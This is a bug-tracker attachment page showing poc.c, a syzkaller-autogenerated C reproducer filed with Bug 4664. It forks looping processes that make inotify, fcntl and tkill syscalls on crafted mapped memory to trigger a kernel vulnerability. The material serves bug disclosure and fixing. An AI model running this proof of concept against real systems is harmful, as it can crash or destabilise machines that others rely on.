Attachment 697 Details for Bug 4664 – Poc files that can trigger vulnerabilities

Poc files that can trigger vulnerabilities

poc.c (text/x-csrc), 3.41 KB, created by DuckRui on 2023-03-30 19:55:32 UTC

(hide)

Description:

Filename:

MIME Type:

Creator: DuckRui

Created: 2023-03-30 19:55:32 UTC

Size: 3.41 KB

patch

obsolete

>// https://syzkaller.appspot.com/bug?id=49b19ab34501b80ce82d0ec7fd6f461db067fdd5
>// autogenerated by syzkaller (https://github.com/google/syzkaller)
>
>#define _GNU_SOURCE
>
>#include <dirent.h>
>#include <endian.h>
>#include <errno.h>
>#include <fcntl.h>
>#include <signal.h>
>#include <stdarg.h>
>#include <stdbool.h>
>#include <stdint.h>
>#include <stdio.h>
>#include <stdlib.h>
>#include <string.h>
>#include <sys/prctl.h>
>#include <sys/stat.h>
>#include <sys/syscall.h>
>#include <sys/types.h>
>#include <sys/wait.h>
>#include <time.h>
>#include <unistd.h>
>
>static unsigned long long procid;
>
>static void sleep_ms(uint64_t ms)
>{
>  usleep(ms * 1000);
>}
>
>static uint64_t current_time_ms(void)
>{
>  struct timespec ts;
>  if (clock_gettime(CLOCK_MONOTONIC, &ts))
>    exit(1);
>  return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
>}
>
>static bool write_file(const char* file, const char* what, ...)
>{
>  char buf[1024];
>  va_list args;
>  va_start(args, what);
>  vsnprintf(buf, sizeof(buf), what, args);
>  va_end(args);
>  buf[sizeof(buf) - 1] = 0;
>  int len = strlen(buf);
>  int fd = open(file, O_WRONLY | O_CLOEXEC);
>  if (fd == -1)
>    return false;
>  if (write(fd, buf, len) != len) {
>    int err = errno;
>    close(fd);
>    errno = err;
>    return false;
>  }
>  close(fd);
>  return true;
>}
>
>static void kill_and_wait(int pid, int* status)
>{
>  kill(-pid, SIGKILL);
>  kill(pid, SIGKILL);
>  for (int i = 0; i < 100; i++) {
>    if (waitpid(-1, status, WNOHANG | __WALL) == pid)
>      return;
>    usleep(1000);
>  }
>  DIR* dir = opendir("/sys/fs/fuse/connections");
>  if (dir) {
>    for (;;) {
>      struct dirent* ent = readdir(dir);
>      if (!ent)
>        break;
>      if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0)
>        continue;
>      char abort[300];
>      snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort",
>               ent->d_name);
>      int fd = open(abort, O_WRONLY);
>      if (fd == -1) {
>        continue;
>      }
>      if (write(fd, abort, 1) < 0) {
>      }
>      close(fd);
>    }
>    closedir(dir);
>  } else {
>  }
>  while (waitpid(-1, status, __WALL) != pid) {
>  }
>}
>
>static void setup_test()
>{
>  prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
>  setpgrp();
>  write_file("/proc/self/oom_score_adj", "1000");
>}
>
>static void execute_one(void);
>
>#define WAIT_FLAGS __WALL
>
>static void loop(void)
>{
>  int iter = 0;
>  for (;; iter++) {
>    int pid = fork();
>    if (pid < 0)
>      exit(1);
>    if (pid == 0) {
>      setup_test();
>      execute_one();
>      exit(0);
>    }
>    int status = 0;
>    uint64_t start = current_time_ms();
>    for (;;) {
>      if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
>        break;
>      sleep_ms(1);
>      if (current_time_ms() - start < 5000)
>        continue;
>      kill_and_wait(pid, &status);
>      break;
>    }
>  }
>}
>
>uint64_t r[2] = {0xffffffffffffffff, 0x0};
>
>void execute_one(void)
>{
>  intptr_t res = 0;
>  res = syscall(__NR_inotify_init1, 0ul);
>  if (res != -1)
>    r[0] = res;
>  syscall(__NR_fcntl, r[0], 8ul, -1);
>  res = syscall(__NR_fcntl, r[0], 0x10ul, 0x20000140ul);
>  if (res != -1)
>    r[1] = *(uint32_t*)0x20000144;
>  syscall(__NR_tkill, r[1], 0xb);
>}
>int main(void)
>{
>  syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
>  syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
>  syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
>  for (procid = 0; procid < 6; procid++) {
>    if (fork() == 0) {
>      loop();
>    }
>  }
>  sleep(1000000);
>  return 0;
>}

Actions: View

Attachments on bug 4664: 697